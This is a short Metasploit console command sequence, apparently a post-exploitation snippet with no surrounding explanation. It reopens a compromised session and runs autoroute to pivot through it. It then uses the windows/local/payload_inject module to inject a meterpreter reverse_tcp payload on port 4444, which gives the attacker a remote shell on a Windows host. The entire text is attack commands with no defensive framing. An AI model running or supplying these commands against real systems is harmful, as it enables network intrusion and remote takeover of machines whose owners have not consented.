sessions -i SESSION
run post/multi/manage/autoroute
background
use exploit/windows/local/payload_inject
set SESSION SESSION
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
exploit